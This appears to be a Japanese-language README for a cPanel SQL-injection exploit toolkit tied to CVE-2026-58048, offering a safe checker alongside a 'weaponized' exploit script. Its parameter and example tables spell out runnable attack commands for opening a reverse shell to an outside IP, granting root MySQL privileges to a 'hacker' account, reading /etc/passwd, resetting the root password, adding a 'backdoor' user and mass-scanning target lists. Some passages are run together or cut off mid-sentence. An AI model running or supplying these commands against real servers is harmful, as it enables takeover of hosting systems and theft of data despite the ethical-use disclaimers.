
👾 CVE-2026-58048 – cPanel Root SQL Execution Toolkit (CVSS 9.4) | 未パッチの cPanel & WHM 11.x 向けの完全な Red/Blue Team Toolkit スイート。2 つのツール: Safe Checker (監査/レポート)、Weaponized (リバースシェル、永続化、UDF RCE、デプロイ、ファイル読み書き、データベース操作、マススキャン)。Python 付き。🦾 倫理的に使用し、合法を守ってください <3

⚠️ 倫理的な使用のみ – 許可されたセキュリティテスト
このリポジトリは、許可されたセキュリティ専門家、ブルーチーム、ペネトレーションテスターのみを対象としたツールを提供します。
コンピュータシステムへの不正アクセスは、CFAA(米国)、Computer Misuse Act(英国)、TCK 243/244(トルコ)、および世界中の同様の法律の下で違法です。
CVE‑2026‑58048 は、cPanel & WHM バージョン 11.x における重大な SQL インジェクション脆弱性であり、認証された cPanel ユーザーがデータベース名変更機能を介して MySQL root 権限で任意の SQL コマンドを実行できるようにします。
ANSI_QUOTES モードに設定し、解析動作を変更します。11.137.1.6 未満は脆弱| ツール | 目的 | 対象ユーザー |
|---|---|---|
exploit.py | リバースシェル、永続化、UDF RCE、ファイル読み書き、データベース操作、プロキシサポート、大量スキャンを備えた完全な武器化ツールキット。 | レッドチーム / 許可されたペンテスター |
safecheck.py | 悪意のあるペイロードを実行せずに cPanel バージョンを検出しリスクを評価する非侵入型脆弱性チェッカー。詳細なレポートを生成します。 | ブルーチーム / セキュリティ監査人 |
git clone https://github.com/tc4dy/CVE-2026-58048-PoC-Exploit
cd CVE-2026-58048
pip install -r requirements.txt
requests
urllib3
colorama
pymysql
exploit.py パラメータsafecheck.py パラメータエクスプロイトは以下の cPanel UAPI エンドポイントを使用します:
このソフトウェアは、教育目的および許可されたセキュリティテストのみを目的として提供されています。
| 機能 | exploit.py | safecheck.py |
|---|
| 脆弱性検出 | ✅ | ✅ |
| バージョン検出 | ✅ | ✅ |
| MySQL root SQL インジェクション | ✅ | ❌ |
| リバースシェル | ✅ | ❌ |
| 永続化(cPanel ユーザー作成) | ✅ | ❌ |
| UDF RCE(コマンド実行) | ✅ | ❌ |
| ファイル読み書き | ✅ | ❌ |
| データベース操作(任意の SQL) | ✅ | ❌ |
| プロキシサポート | ✅ | ✅ |
| 大量スキャン(マルチスレッド) | ✅ | ❌ |
| インタラクティブシェル | ✅ | ❌ |
| 非侵入(安全)モード | ❌ | ✅ |
| 詳細/デバッグモード | ✅ | ✅ |
| SSL 検証制御 | ✅ | ✅ |
| カスタム User‑Agent | ✅ | ✅ |
| リクエスト遅延 / リトライ | ✅ | ❌ |
| JSON / レポート出力 | ✅ | ✅ |
| エンドポイントアクセシビリティチェック | ❌ | ✅ |
| SQL モード漏洩検出 | ❌ | ✅ |
| シナリオ | 推奨ツール |
|---|
| ブルーチーム – cPanel インストールが脆弱かどうかの確認 | safecheck.py |
| セキュリティ監査 – 非侵入型脆弱性評価 | safecheck.py |
| レッドチーム – 完全なエクスプロイトを伴う許可されたペネトレーションテスト | exploit.py |
| バグバウンティ – 責任ある開示テスト | safecheck.py |
| 大量スキャン – 複数のターゲットの脆弱性チェック | exploit.py(検出のみ) |
| インシデント対応 – システムが侵害されているかどうかの確認 | safecheck.py |
| パラメータ | 説明 |
|---|
-t, --target | 対象 cPanel URL(例: https://cpanel.example.com:2083) |
-l, --target-file | 大量スキャン用のターゲットリストを含むファイル(1行に1つ) |
-u, --mysql-user | cPanel/MySQL ユーザー名 |
-P, --mysql-pass | cPanel/MySQL パスワード |
--mysql-port | MySQL ポート(デフォルト: 3306) |
-p, --port | cPanel ポートを上書き(デフォルトは URL から、または 2083) |
--threads | マルチターゲット用のスレッド数(デフォルト: 10) |
-o, --output | 結果をファイルに保存(単一ターゲット) |
--log | 詳細出力用のログファイル |
-v, --verbose | 詳細出力 |
--proxy | HTTP/HTTPS プロキシ(例: http://127.0.0.1:8080) |
-ua, --user-agent | カスタム User‑Agent |
--no-keep-alive | セッションを維持しない |
--delay | リクエスト間の遅延(デフォルト: 2.0秒) |
--max-retries | 最大リトライ回数(デフォルト: 3) |
--ssl-verify | SSL 証明書を検証 |
--cmd | 実行するコマンド(特定の場合は sql: または udf: をプレフィックス) |
--inject | 注入するカスタム SQL(他のアクションを上書き) |
--reverse-shell | リバースシェル IP:PORT(UDF を使用) |
--passwd | MySQL root パスワードを変更 |
--adduser | cPanel ユーザーを作成(USER DOMAIN PASSWORD) |
--read | LOAD_FILE を介してファイルを読み取り |
-i, --interactive | エクスプロイト後のインタラクティブシェル |
--verify | MySQL ログインを試みてエクスプロイトの成功を検証 |
--ping | エクスプロイト前にターゲットを ping |
| パラメータ | 説明 |
|---|
-t, --target | 対象 cPanel URL(例: https://cpanel.example.com:2083) |
-v, --verbose | 詳細出力 |
--proxy | HTTP/HTTPS プロキシ(例: http://127.0.0.1:8080) |
-ua, --user-agent | カスタム User‑Agent |
--ssl-verify | SSL 証明書を検証 |
--timeout | リクエストタイムアウト(秒)(デフォルト: 10) |
--log | レポートをファイルに保存 |
--json | 結果を JSON 形式で出力 |
| # | シナリオ | コマンド |
|---|
| 1 | 簡易脆弱性チェック | python safecheck.py -t https://cpanel.example.com:2083 |
| 2 | レポート付き詳細スキャン | python safecheck.py -t https://cpanel.example.com:2083 --log report.txt --json -v |
| 3 | リバースシェル | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444 |
| 4 | カスタム SQL の実行(root) | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --inject "GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%' IDENTIFIED BY 'pwned'" |
| 5 | 機密ファイルの読み取り | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd |
| 6 | MySQL root パスワードの変更 | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123 |
| 7 | 新しい cPanel ユーザーの作成(永続化) | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123 |
| 8 | エクスプロイト後のインタラクティブシェル | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i |
| 9 | ファイルからの大量スキャン | python exploit.py -l targets.txt -u user -P pass --threads 20 --output results.json |
| 10 | プロキシとカスタム User‑Agent の使用 | python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 -ua "Mozilla/5.0 (X11; Linux x86_64)" |
| エンドポイント | 目的 |
|---|
/execute/Mysql/create_database | 一時データベースを作成 |
/execute/Mysql/delete_database | 作成したデータベースをクリーンアップ |
/execute/Mysql/rename_database | 脆弱なエンドポイント – SQL インジェクションをトリガー |
/execute/Version/get_version | 認証とバージョンチェック |
/execute/UserManager/create_user | 新しい cPanel ユーザーを作成(永続化) |
/execute/UserManager/list_users | 既存ユーザーを一覧表示 |